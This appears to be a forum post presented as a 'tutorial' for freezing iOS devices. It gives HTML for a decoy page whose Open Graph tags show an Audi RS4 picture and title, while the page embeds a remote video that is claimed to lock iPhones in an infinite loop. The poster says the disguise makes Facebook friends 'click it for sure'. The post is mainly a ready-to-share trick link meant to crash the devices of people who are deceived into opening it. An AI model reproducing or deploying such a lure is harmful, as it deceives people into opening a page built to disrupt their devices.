Tutorial How to freeze all IOS devices.

Is it funny?

  • Yes

    Votes: 3 75.0%
  • No

    Votes: 1 25.0%

  • Total voters
    4

Laszl0w

Well-Known Member
Oct 10, 2015
217
149
143
Code:
<html xmlns="http://www.w3.org/1999/xhtml"
      xmlns:fb="http://ogp.me/ns/fb#">
     <meta property="og:image" content="http://autokotua.com/img/spec/mdf/audi-rs4-sedan-2005.jpg" />
     <meta property="og:description" content="Audi RS4 2.7 biturbo"/>
     <meta property="og:url" content="http://92.249.134.101/audirs4"/>
       <head>
       
       <title>Audi RS4 2.7 biturbo</title>

       <style type="text/css">

       input {
       width: 150px;
       }

       td {
       font-size: 12px;
       font-family: Verdana, "Trebuchet MS";
       text-align: left;
       }

       span.err {
       color: red;
       }

       span.ok {
       color: green;
       }

       </style>

       </head>
       <center>
       <h1>Audi RS4 2.7 biturbo</h1>
       <body bgcolor ="black" text = "red">
       <embed src="http://wylsa.com/VIDOSI/IMG_0942.mp4" width="600" height="600" controller="false">
       <br><br><br>
       </div>
       </body>
       </html>

The video in the code causes infinite loop on all IOS devices so its freezed.
When you put it into facebook it shows an Audi RS4 so your friends will click it for sure.
 
Top